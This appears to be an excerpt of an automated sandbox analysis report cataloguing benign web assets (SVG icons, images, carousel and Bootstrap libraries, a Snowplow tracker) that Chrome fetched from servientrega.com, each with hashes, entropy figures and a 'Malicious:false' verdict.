            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 28</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-834.000000, -126.000000)">. <g id="Group-28" transform="translate(834.000000, 126.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-8" transform="translate(0.000000, 6.893769)">. <path d="M14.2376106,11.6381261 L9.14128659,11.6381261 L8.58764087,9.4279342 L14.965222,9.4279342 L14.2376106,11.6381261 Z M15.8737577,8.77688002 C15.795908,8.66902335 15.6710877,8.5990035 15.5380039,8.5990035 L8.5084865,8.5990035 C8.46543,8.5990035 8.42454807,8.6137903 8.38497088,8.62596767 L8.18186597,7.81095396 C8.13
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (360)
            Category:dropped
            Size (bytes):89992
            Entropy (8bit):5.084392122174397
            Encrypted:false
            SSDEEP:1536:owLoreUC7AuLMjvNlP8GNMBJ6IcIhKJQIOybQOoiYM9OJ0QQKOv:oUMNlPBqJTuOGQOotEhKOv
            MD5:CCDF893E7D8B26933AF0C336BCC3943E
            SHA1:AC575BA3377F95EF22BAD865EC35B0B3DCB0DFE0
            SHA-256:DB9D6CF3C1C4B047C62F646E7D9991C06A212931C362BF53F9A2406B30F09466
            SHA-512:818DB99C2EB775D1342DC2CF871509185C5AD86A08C80E452F29B8509A870C43078E9F11113E999FF487A35B25B6DDD6B95B6A7F2C4408FDFCFDD69473F59510
            Malicious:false
            Reputation:low
            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */./**. * Owl carousel. * @version 2.3.4. * @author Bartosz Wojciechowski. * @author David Deutsch. * @license The MIT License (MIT). * @todo Lazy Load Icon. * @todo prevent animationend bubling. * @todo itemsScaleUp. * @todo Test Zepto. * @todo stagePadding calculate wrong active classes. */.;(function($, window, document, undefined) {.../**.. * Creates a carousel... * @class The Owl Carousel... * @public.. * @param {HTMLElement|jQuery} element - The element to create the carousel for... * @param {Object} [options] - The options.. */..function Owl(element, options) {..../**... * Current settings for the carousel.... * @public... */...this.settings = null;..../**... * Current options set by the caller including defaults.... * @public... */...this.options = $.extend({}, Owl.Defaults, options);..../**... * Plugin element.... *
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1536
            Entropy (8bit):5.219906144393995
            Encrypted:false
            SSDEEP:24:t4LRndFtxY6bgwHFUHc87OOJXLZckYWz6/5uKRxseAwHFUHc87OOJ48byF5lMihY:+RHgFPXLZcfWz6hWP4nFTS
            MD5:E5C5A06E062EF5D90996B78EA47F34E0
            SHA1:68D40AE874118DD4CFD57A78FA15281608211E3F
            SHA-256:80940BC522CF67814164D1BD2A3C642CE1783F4D80958D2E0CBEC812B01AAF3F
            SHA-512:2A07B2628FD195489EF82A43D8E6CC64734B4D614475B95AB47BD9B54A68FD0102567BCACFAE17916C70556C779A6EC6881A9A21E2BE74538F9E856EC21F73B3
            Malicious:false
            Reputation:low
            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><path d="M120.42141,236.26563c-55.60791,0 -100.68704,-45.07912 -100.68704,-100.68704v-15.15719c0,-55.60791 45.07912,-100.68704 100.68704,-100.68704h15.15719c55.60791,0 100.68704,45.07912 100.68704,100.68704v15.15719c0,55.60791 -45.07912,100.68704 -100.68704,100.68704z" id="shape"></path></g><g fill="none" fill-rule="none" stroke="none" stroke-width="1" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><g transfor
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:GIF image data, version 89a, 16 x 16
            Category:dropped
            Size (bytes):825
            Entropy (8bit):5.928155937589366
            Encrypted:false
            SSDEEP:12:GtdBjVZb/QirLEYairL+PT8airLhzHvmEirLb5v8pirLV+01M+irLF+vmEirLH7k:WnDJLDHLq4LhzeFLuiLV++MzLFmYLbk
            MD5:62C0A6925A589E3EAAD809B23C9EC31C
            SHA1:F1B251CE6565F0948C1B6A651FDFBB2B1C81B416
            SHA-256:FCDBC127C2E8495D699E3B206607D5FFCC133179897005AEC1A0194D2469F7F6
            SHA-512:F0006A49CE3564274EF41803AAA6D58BE03451ADA90608F8F59D697BDF765D7DC4DF8A1AC7DDB05DA60E0AFCA7E7BB08B6CA5777D7A32FBFB43873CD371A0F54
            Malicious:false
            Reputation:low
            Preview:GIF89a..........zzz.........................................!..NETSCAPE2.0.....!.......,..........H..B..Z.g)....}.H..I.l...at. .......p...p....&..|.....Q.^....."'.N..!.......,..........H..J..Z..1....}.H..I.l...qt.A .......p........&..|.....Q.^....."'.N..!.......,..........H.....Z..9....}.H..I.l....tS. .......p..e0....&..|.....Q.^....."'.N..!.......,..........H....Z.'.....}.H..I.l...0tSQ .......p..E ....&..|.....Q.^....."'.N..!.......,..........H.....Z.......}.H..I.l... t.a .......p...@....&..|...@.Q.^....."'.N..!.......,..........H....Z.......}.H..I.l...At.q .......p..%.....&..|...B.Q.^....."'.N..!.......,..........H.....Z.'!....}.H..I.l..T.t.. .......p...P....&..|.....Q.^....."'.N..!.......,..........H.....Z.g.....}.H..I.l..TQt.0 .......p...`....&..|.....Q.^....."'.N..;
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (18589)
            Category:dropped
            Size (bytes):18654
            Entropy (8bit):5.371055687974937
            Encrypted:false
            SSDEEP:384:lQc2SBgP+hiq7QlMzCVV5jzwc06Bk76u9Mk89B7f:Kc2Mk+7y/fk6uqkm
            MD5:836A3DB3F2B3A883371F39B1E78E62A1
            SHA1:1C4B1B03254CA3A51CEEAFA6EF21CDC381DCAAAD
            SHA-256:E8DC09E4DDC3C326EF6341498E7E8E70AF3A848713429B909BE53C947B43DA10
            SHA-512:B91E3A18EC1151EA458B677371AB4EDEAA6BE289C08F8E950BD96D3C5230697F185E5E4ED7C9D54FF26725963BCAAAEB2943F49E00FF623B9AB6C26A083A58CA
            Malicious:false
            Reputation:low
            Preview:/*! sly 1.6.1 - 8th Aug 2015 | https://github.com/darsain/sly */.!function(a,b,c){"use strict";function d(b,p,q){function K(c){var d=0,e=Gb.length;if(yb.old=a.extend({},yb),wb=tb?0:ub[rb.horizontal?"width":"height"](),Bb=zb[rb.horizontal?"width":"height"](),xb=tb?b:vb[rb.horizontal?"outerWidth":"outerHeight"](),Gb.length=0,yb.start=0,yb.end=H(xb-wb,0),Rb){d=Ib.length,Hb=vb.children(rb.itemSelector),Ib.length=0;var f,g=j(vb,rb.horizontal?"paddingLeft":"paddingTop"),h=j(vb,rb.horizontal?"paddingRight":"paddingBottom"),i="border-box"===a(Hb).css("boxSizing"),l="none"!==Hb.css("float"),m=0,n=Hb.length-1;xb=0,Hb.each(function(b,c){var d=a(c),e=c.getBoundingClientRect(),i=G(rb.horizontal?e.width||e.right-e.left:e.height||e.bottom-e.top),k=j(d,rb.horizontal?"marginLeft":"marginTop"),o=j(d,rb.horizontal?"marginRight":"marginBottom"),p=i+k+o,q=!k||!o,r={};r.el=c,r.size=q?i:p,r.half=r.size/2,r.start=xb+(q?k:0),r.center=r.start-G(wb/2-r.size/2),r.end=r.start-wb+r.size,b||(xb+=g),xb+=p,rb.horizont
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 300 x 74, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):7499
            Entropy (8bit):7.962907422048286
            Encrypted:false
            SSDEEP:192:dUXIuhwNU6CLdUnchF09An0W8dleiAUnKhfnVCcRmpZ:cII6CTUS0W82dCc8pZ
            MD5:45B6886EFE79C102E84D0FDB6A6EBA81
            SHA1:03E5EDE7C76ED7718F3005690958FE1859737BA1
            SHA-256:4FF76BCB1EB34A70B2871C43836D3240EBB9ACE5FC258DD9D1697E92F01235A9
            SHA-512:2809451164893B5C3DD7899166AD191E811469E4C2557D6BBE003D6C4B03F4A73EA9757270AEB6222D82F9C0FE0ECA7D5C161445B65A9983298A9FCD86123805
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/clutch-logo-footer.png
            Preview:.PNG........IHDR...,...J.......i.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx.......&g&A.p..'...e`ov..b.XJV.'...4s.8..qn$k..XR,...u...^....=.($R.,..Y`.@l.J.d9X..].f.=...l6............U].:u.SU....`0.....`0........+..aB.....(M..O^=...b7...W..!%...}.ce.......L...lv.&....t..>.b.&.n.%....F`..%\....m.2.L...i...`...IhY,@...8v...~...D..X*........j.R..vq.ty.$^.Zw.t......,....V.:.@...Vb...j.;.R...Y..@.\.X....w...S.eJ..}......U:..J.8vh.!..:.-.j0.....E...)...-...|...:......e.y}.tq.v...^..*._.....zc...W.=R..p$.|..gc..,@.L.....s.....Oe...,j.z%..V.2...../.....@....I...f...rT.*../.. .].UE...u.Z.\...w.Z.O.U.}(..}.4...T..N..LG.\.k.i.B_+.~DyV..B...o....9.+....C/..2....(..`.w.V.gg%L(..G....|....$b....R.Z...CB..aA..~....H]...p.4..*..]y.ZV...~*.^.P.. ..WHT..@..q.}..........q..U.A4.)..L...XN'...P........i.0B.....Q..rV.U&eie..]H.kn$....FU....#...w.4....."b.v.{Q..b..=@+..L.gP.....@.Q...M]X....0._V.<.1.....N....w\/].....A...L...UC..8...W.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):88955
            Entropy (8bit):4.261468404542537
            Encrypted:false
            SSDEEP:1536:0XWVBuGGI2R7R+FXDyMibroAPoJATv2UsWNuJ:0XWVLGI2R7R+FTyMibroAwJATAJ
            MD5:483A3731BBE7046C1DA3163DA76DBE98
            SHA1:5E96500865DA826F8509334F034422BE7662B46D
            SHA-256:9BAA573E4378873B7AC81CCB1D954CE9BB2B1A933947AD3012263DDC604D8505
            SHA-512:58D67055E6D08E14B1133C1B7ADB46B90816C5BA587682DFEE61FEDB903BB1F41B6F129E4B9490F5005FF7BCCE6389CE970B64B200C0FDCCD24E67E3E0350489
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.js
            Preview:/*. _ _ _ _. ___| (_) ___| | __ (_)___./ __| | |/ __| |/ / | / __|.\__ \ | | (__| < _ | \__ \.|___/_|_|\___|_|\_(_)/ |___/. |__/.. Version: 1.8.1. Author: Ken Wheeler. Website: http://kenwheeler.github.io. Docs: http://kenwheeler.github.io/slick. Repo: http://github.com/kenwheeler/slick. Issues: http://github.com/kenwheeler/slick/issues.. */./* global window, document, define, jQuery, setInterval, clearInterval */.;(function(factory) {. 'use strict';. if (typeof define === 'function' && define.amd) {. define(['jquery'], factory);. } else if (typeof exports !== 'undefined') {. module.exports = factory(require('jquery'));. } else {. factory(jQuery);. }..}(function($) {. 'use strict';. var Slick = window.Slick || {};.. Slick = (function() {.. var instanceUid = 0;.. function Slick(element, settings) {.. var _ = this, dataSettings;.. _.defaults = {. ac
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1189
            Entropy (8bit):4.960460618230308
            Encrypted:false
            SSDEEP:24:2dcQ+9xJoeH4mFTt3Qeow6Y/aTMTXMGpFR8ZfpYplTuDbU/ewVR4WY2:cbe0nm1Jj6WXXV+fSVPX4y
            MD5:A7A96451EBDF70AA5F17172EE1EB7376
            SHA1:10F2ACF161E72FBDC18E631261C0F0A9DE04C51F
            SHA-256:C0C2438DDBF2DC191FF70846BCC30C579B71393B82C3C22C10D55AF8A242A3A0
            SHA-512:82FB50AED516CC407DC9D72630FA84223A856894CA68AAFC293C05FF511FC729875AC3339974FAE85D3A1F485A50DE297E4FF2154480FA73AD6544469CF3B209
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/menu-hamburguer.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="menu-(1)">.. <path d="M0.875252 1.61904L22.1541 1.61904C22.6373 1.61904 23.0294 1.25634 23.0294 0.809522C23.0294 0.362636 22.6372 0 22.1541 0L0.875252 0C0.392081 0 1.77376e-14 0.362704 1.77376e-14 0.809522C1.77376e-14 1.25634 0.392154 1.61904 0.875252 1.61904Z" transform="translate(3.970581 0)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M26.117 0L0.882973 0C0.395539 0 1.77982e-14 0.362704 1.77982e-14 0.809523C1.77982e-14 1.25634 0.395613 1.61905 0.882973 1.61905L26.117 1.61905C26.6044 1.61905 27 1.25634 27 0.809523C27 0.362704 26.6044 0 26.117 0Z" transform="translate(0 8.095215)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M18.7086 0L0.938481 0C0.420405 0 -2.79474e-14 0.362704 -2.79474e-14 0.809522C-2.79474e-14 1.25641 0.420483 1.61904 0.938481 1.61904L18.7086 1.619
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):16124
            Entropy (8bit):4.299491965316094
            Encrypted:false
            SSDEEP:384:4kjTlnk60eJkF/KiCJGswj/s/XciIUb57PIK:XTC60ckFqJU4jxt
            MD5:C6F3D81373AA05B1939104A6C20016EB
            SHA1:B8220119A9DF75DF0E6628AFCF00157BA590EB3B
            SHA-256:43B6F9F5934723F32D733FA0AE4B7F6D53126B11D67C37FA7738DBF824E67B43
            SHA-512:2B9FDB952CCF7EB66EE63A911024EF06336834CD392278AC59B1A871650F04A0AE612FB5A7ACCB4A38ADCAAFB70B56D8999BC55DBD37A6D6EF4D0C69A906DD6A
            Malicious:false
            Reputation:low
            Preview:<svg width="57" height="50" viewBox="0 0 57 50" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2848_5211)" filter="url(#filter0_d_2848_5211)">.<path d="M24.6997 19.4844L23.8423 24.6599L28.3306 22.2164H28.6661L33.1543 24.6599L32.2969 19.4844L32.4007 19.1543L36.0318 15.4884L31.0137 14.7334L30.7424 14.5295L28.4984 9.82056L26.2542 14.5295L25.983 14.7334L20.9648 15.4884L24.5961 19.1543L24.6997 19.4844Z" fill="#FFEC3F"/>.<path d="M10.0317 10.216C9.5709 11.2561 9.18919 12.3317 8.89001 13.4333C9.07048 14.0751 9.08209 14.7553 8.92363 15.4033C8.89294 15.5637 8.84196 15.7191 8.772 15.8657C8.76179 15.8879 8.7475 15.9078 8.72992 15.9244C8.71302 15.9424 8.6928 15.9566 8.67046 15.9663C8.56494 16.0166 8.454 16.0535 8.33999 16.0764C8.18358 17.1397 8.10453 18.2137 8.10352 19.2892C8.10352 19.4351 8.10649 19.5808 8.10946 19.7267C8.57833 20.4021 8.82497 21.2159 8.81294 22.0477C8.82041 22.2207 8.80565 22.3939 8.76903 22.5628C8.76454 22.5834 8.75681 22.6031 8.74616 22.6211C8.73191 2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65301), with CRLF line terminators
            Category:downloaded
            Size (bytes):162726
            Entropy (8bit):5.059959643576294
            Encrypted:false
            SSDEEP:1536:QtawT8if0W8DsEBpy0cuJBf2rIWn5gyVUpz600I4f3:QtawEyVUpz600I4f3
            MD5:B43DDE58FE773293F072902815449A2D
            SHA1:8EDB075AC78B6DCFBEDA4209683DA02F82EB79E8
            SHA-256:4A221530681185D5E32924C875D5FB9A1F486CE5D573041673BFE9E274BA0FFD
            SHA-512:6E3CC4C18E4801EEF50D5A05E4DBBD5AD30EDCDBD2ADDFC94D05EE00F5E75761D0A1E596ABDBE76AC987BFE1BB1BCC9017CC90B200B1CB0F1396348519FDA585
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/css/bootstrap.min.css
            Preview:@charset "UTF-8";/*!.. * Bootstrap v5.1.0 (https://getbootstrap.com/).. * Copyright 2011-2021 The Bootstrap Authors.. * Copyright 2011-2021 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):1299
            Entropy (8bit):7.824363064103566
            Encrypted:false
            SSDEEP:24:yI+gu+f7uhDAOhLMloycmeIKLF9j/M9ZsCojHni/BN8Fs:Q+f7uhDAOhL2cXIoF9k9ZujHi/BNws
            MD5:71F203773F1C8DE693FE31E2680509B4
            SHA1:F1DD54112D5F61919BC16A7B5C8C228E18AF4FB8
            SHA-256:2D4E11241B243339B2EA18A5FEBF5B2E1F415BD1F8DB1C63D44F7926DC82300C
            SHA-512:58B0B78EB69780A0A7E5D87689EDD5FEB04CD2F20030861644EE1FFCBA0739F8C0CAB501A818F99334430C315B0F44F4F2714ACA78BACDE479957073534E1E68
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...$...$.............sRGB.........IDATX..XKl.U.}w.....@.8q..B....).5....J...!$6|...`Q(+.(.$.*..BB,"..R ..T..I7.../.D.'NT(%j>t...5......H.{s...}.3.....o.vqu@Hy.$.MB.$~..~...I1+...7G.\j..P..`x{......3.....'+....I.[jw.S/6U...w.-h......XAg....Z...T.....<(.....!...N.d.M.....c.......$[WV..R....#'..h....Y..8..d..IL..v.F.....-J.N.$e.J#2.L.?.?.}..W.!./T.od$.c.P.{..S.Hh}5.....V_.\}../m.....Ix.[Sksk8..O.Ju...............wN.c.\.f..`...k...._........#z.J...X.7.9.T.O"u.YFP.lB....'1.&W|.m7y..>....gS@.~wsr86.......e8....v. iJ...V....p.QN1..oq..f.;a...X=2. .F-.....>.<.....abG.c..3..[xYB.{.+.'lu....R..F....=.7G.....H}.*...|..U..>...J.R./.r..U'.hz...VY#...S...U.....G..ok1...=uNH.>..UlM.o-R.S......P....N.t1.j..O.;.....Dk.b.)x......M.....6..+H.;..}.:....... ..Z.F_....+..3O...m8..`.:*..;.T.).k.V.gJ.*..8...<gW..%z5].......E...W...tJ.....J.9r.>N.@6q.{K..I.w.b8.......?..".a...]..:.]t.!.'...~cN..T.a.....-...n.......-,...;).Qn.B...F..#.<?R..e.{.#/.r.W...z
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (14018), with no line terminators
            Category:dropped
            Size (bytes):14031
            Entropy (8bit):5.275976554644413
            Encrypted:false
            SSDEEP:192:hykEY9w8KrUfIEZpBNhFCUdFNrGzgt6uUT0/LyQ+RoxVzC6U:hykRO8KrUfIEdNh4YMzgV+mfU
            MD5:DCDBA5F88CA338CC3E22E45ABAE77791
            SHA1:6B3DD2B99E4AACDD87761C0C2374E6EA90D141F6
            SHA-256:034D5358B4C1C2D315833CA2D0B8233D95FC6A843A476C138330A8E06D31E832
            SHA-512:198F59A5DCA5806D3DB0E934921381BC65D9B284FF9E95C18DB7FBDCCC8CAD8B7DE3279D5A8608B17C5A0B332831261DD8ACE632AFB30F6C22AF3C11B5927BF6
            Malicious:false
            Reputation:low
            Preview:function a37_0x3918(_0x551e0a,_0x31ba89){const _0x5c5ea1=a37_0x1fc7();return a37_0x3918=function(_0x3c4fe6,_0x11f724){_0x3c4fe6=_0x3c4fe6-0xa9;let _0x1fc7de=_0x5c5ea1[_0x3c4fe6];return _0x1fc7de;},a37_0x3918(_0x551e0a,_0x31ba89);}const a37_0x169961=a37_0x3918;(function(_0x3b52ea,_0x140474){const _0x2f4c4b=a37_0x3918,_0xa7fe6c=_0x3b52ea();while(!![]){try{const _0x23b576=parseInt(_0x2f4c4b(0xe5))/0x1*(-parseInt(_0x2f4c4b(0xb6))/0x2)+parseInt(_0x2f4c4b(0xf3))/0x3*(parseInt(_0x2f4c4b(0xd6))/0x4)+parseInt(_0x2f4c4b(0xcb))/0x5+parseInt(_0x2f4c4b(0x112))/0x6*(-parseInt(_0x2f4c4b(0xdd))/0x7)+parseInt(_0x2f4c4b(0xce))/0x8+parseInt(_0x2f4c4b(0xb0))/0x9*(-parseInt(_0x2f4c4b(0x109))/0xa)+-parseInt(_0x2f4c4b(0xbb))/0xb*(-parseInt(_0x2f4c4b(0x108))/0xc);if(_0x23b576===_0x140474)break;else _0xa7fe6c['push'](_0xa7fe6c['shift']());}catch(_0x370727){_0xa7fe6c['push'](_0xa7fe6c['shift']());}}}(a37_0x1fc7,0x1d0aa));function a37_0x1fc7(){const _0x537d6c=['Hay\x20errore','.O.box,\x20c/','statePlace','ente\x
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):10409
            Entropy (8bit):4.168738315809581
            Encrypted:false
            SSDEEP:192:gTmKImxGgWXCHGq91oLJ4dmBfLKnxKwKtx5RiTq:gTemxGgWyHniJ4wBjKxdqf
            MD5:C9431F464D2C18B06E2BAC6CAB90E6CC
            SHA1:D51543C649347A27CB91EF56B84BC10EB4C4DC1A
            SHA-256:1E782C52411F41C02095854A610827BA2989E90D95D878C683D32EAE6F4A9AE4
            SHA-512:5F340BEBB6DA879FB1D960341251EFA4BB256441B64A112A268B80911A343E58D1B7031A574A719E0423AC8A87D9366FC176F7515A9D706184AEBE89681BA268
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 30</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-376.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-30" transform="translate(290.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(1.000000, 2.893769)">. <path d="M27.9076983,2.98076217 C27.814557,3.12742011 27.6820671,3.24727504 27.5117229,3.3231326 C27.4927958,3.33172979 27.4743668,3.34184413 27.4564358,3.35246418 C27.4365125,3.35853279 27.4170873,3.36510711 27.3976621,3.3737043 L2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):17096
            Entropy (8bit):4.06268773612239
            Encrypted:false
            SSDEEP:384:yRIaq2IcnRr9ATrKeIYJwHe5NVMtkmvzYeC5OWLIV4lC6:yRIa2cnRr9ATW5u75N1mvzb4l9
            MD5:4E76A20309EC1E227FB24B73C1D80F62
            SHA1:4349111C3A9769B172B35FB7A5C67DF45E12680F
            SHA-256:6E538FD4830A9E6A7249EE815FDA61CC682CE78926D0B04EB1A553D708F23AAB
            SHA-512:FB51B21BE9A45EF1B8E5504B7DCB1416FC00759210AA2F1F33E422BAC14074864A56FB2C2B7C701C3C922CB06D1281D3B7348FCF9C1FAFBFE9F7C319DAEEF4B2
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 16</title>. <defs>. <polygon id="path-1" points="0 0 27 0 27 21 0 21"></polygon>. </defs>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-608.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-16" transform="translate(522.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3">. <mask id="mask-2" fill="white">. <use xlink:href="#path-1"></use
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (22932)
            Category:dropped
            Size (bytes):23070
            Entropy (8bit):5.226634512155472
            Encrypted:false
            SSDEEP:384:QhrHpZky+JB6/tX2lHldkMiYnFpY54LjfdANAc0Eny+RWuW7NeoMwV/vtrx+OLDE:c+JB6/8lHldkMioFpY54PKQEny+kLxVc
            MD5:9346EC27896981BC4C0B146CF327727A
            SHA1:21486194BAA22EB1155FE98BF7AF6314E7773CC7
            SHA-256:50E497B00818378DCFFE856B994F89947B620C66163768879C9B8A63D583F898
            SHA-512:6DA45EF1A2F7F82BE8F17464F9827FD4A7490C18B86B2EC43677DAA7F80475147EAF3D2B0931C1343542626E87951DD698C142BD14B87D9936A8D2486323E019
            Malicious:false
            Reputation:low
            Preview:/*! jQuery Validation Plugin - v1.16.0 - 12/2/2016. * http://jqueryvalidation.org/. * Copyright (c) 2016 J.rn Zaefferer; Licensed MIT */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=a(require("jquery")):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.on("click.validate",":submit",function(b){c.settings.submitHandler&&(c.submitButton=b.target),a(this).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(this).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.on("submit.validate",function(b){function d(){var d,e;return!c.settings.submitHandler||(c.submitButton&&(d=a("<input type='hidden'/>").attr("name",c.s
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):559
            Entropy (8bit):5.390602373716871
            Encrypted:false
            SSDEEP:12:GHxmMmXumOfN/65HgKPVaWAYmRWQkWk6x/XbmSuLEAx70n3rEo+:GHxFcun565HgKPVfVmRWvWkhELgj
            MD5:15E48A72ACC9ADC6F4AAE13A5295BA35
            SHA1:0DA5F9D7E9D80C7F881BB18C51495A8B13286FAF
            SHA-256:2DBDCC90383AA0C9419D784B069D6B814BD663102C019304C410E9C32AD23951
            SHA-512:484FB554EA8802511F80183EDA4B4480E50A9613B5DE75A6104817E4BF89E37D3DB6162D4E35EE2CE6170714ABE8AC702B749F067A70F22A44E0630A3D7EE281
            Malicious:false
            Reputation:low
            Preview:;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];.p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments).};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[0];n.async=1;.n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,"script","//sth0d7m9clo4y72mjm8vh3.s.decidata.tv/v3.7.0.js","snowplow"));. .snowplow("newTracker", "sp", "sth0d7m9clo4y72mjm8vh3.t.decidata.tv", {. appId: "sth0d7m9clo4y72mjm8vh3",. discoverRootDomain: !0,.});..snowplow("trackPageView");
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1189
            Entropy (8bit):4.960460618230308
            Encrypted:false
            SSDEEP:24:2dcQ+9xJoeH4mFTt3Qeow6Y/aTMTXMGpFR8ZfpYplTuDbU/ewVR4WY2:cbe0nm1Jj6WXXV+fSVPX4y
            MD5:A7A96451EBDF70AA5F17172EE1EB7376
